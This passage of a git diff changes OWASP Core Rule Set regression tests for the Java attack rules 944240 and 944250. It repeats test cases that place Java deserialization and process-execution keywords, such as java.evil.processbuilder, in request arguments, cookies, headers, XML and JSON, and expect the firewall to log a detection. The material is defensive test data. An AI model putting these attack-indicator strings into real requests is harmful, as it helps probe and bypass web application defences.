"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-59 + desc: "Cookie name includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.prototypeclonefactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-60 + desc: "Request header test includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-61 + desc: "XML attribute value includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-62 + desc: "XML element value includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-63 + desc: "Nested XML element value includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-64 + desc: "Content-Type text/plain includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-65 + desc: "Content-Type application/json arg value includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeclonefactory\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-66 + desc: "Content-Type application/json arg name includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.prototypeclonefactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-67 + desc: "Argument test includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-68 + desc: "Argument name includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-69 + desc: "Cookie test includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.prototypeserializationfactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-70 + desc: "Cookie name includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.prototypeserializationfactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-71 + desc: "Request header test includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.prototypeserializationfactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-72 + desc: "XML attribute value includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-73 + desc: "XML element value includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-74 + desc: "Nested XML element value includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-75 + desc: "Content-Type text/plain includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-76 + desc: "Content-Type application/json arg value includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeserializationfactory\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-77 + desc: "Content-Type application/json arg name includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.prototypeserializationfactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-78 + desc: "Argument test includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-79 + desc: "Argument name includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.whileclosure=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-80 + desc: "Cookie test includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-81 + desc: "Cookie name includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.whileclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-82 + desc: "Request header test includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-83 + desc: "XML attribute value includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-84 + desc: "XML element value includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-85 + desc: "Nested XML element value includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-86 + desc: "Content-Type text/plain includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-87 + desc: "Content-Type application/json arg value includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.whileclosure\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-88 + desc: "Content-Type application/json arg name includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.whileclosure\": \"test\"}" + output: + log_contains: "id \"944240\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml index a4de979039..abca823e9d 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml @@ -1,517 +1,431 @@ --- - meta: - author: "spartantri" - enabled: true - name: "944250.yaml" - description: "Positive tests for rule 944250" - tests: - - - test_title: 944250-0 - desc: "Argument test includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.evil.runtime" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-1 - desc: "Argument name includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.evil.runtime=test" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-2 - desc: "Cookie test includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.evil.runtime - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-3 - desc: "Cookie name includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.evil.runtime=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-4 - desc: "Request header test includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.evil.runtime - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-5 - desc: "XML attribute value includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-6 - desc: "XML element value includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.evil.runtime" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-7 - desc: "Nested XML element value includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.evil.runtime" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-8 - desc: "Content-Type text/plain includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.evil.runtime" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-9 - desc: "Content-Type application/json arg value includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.evil.runtime\"}" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-10 - desc: "Content-Type application/json arg name includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.evil.runtime\": \"test\"}" - output: - log_contains: "id \"944250\"" - - - test_title: 944250-11 - desc: "Argument test includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-12 - desc: "Argument name includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.evil.processbuilder=test" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-13 - desc: "Cookie test includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.evil.processbuilder - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-14 - desc: "Cookie name includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.evil.processbuilder=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-15 - desc: "Request header test includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.evil.processbuilder - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-16 - desc: "XML attribute value includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-17 - desc: "XML element value includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-18 - desc: "Nested XML element value includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 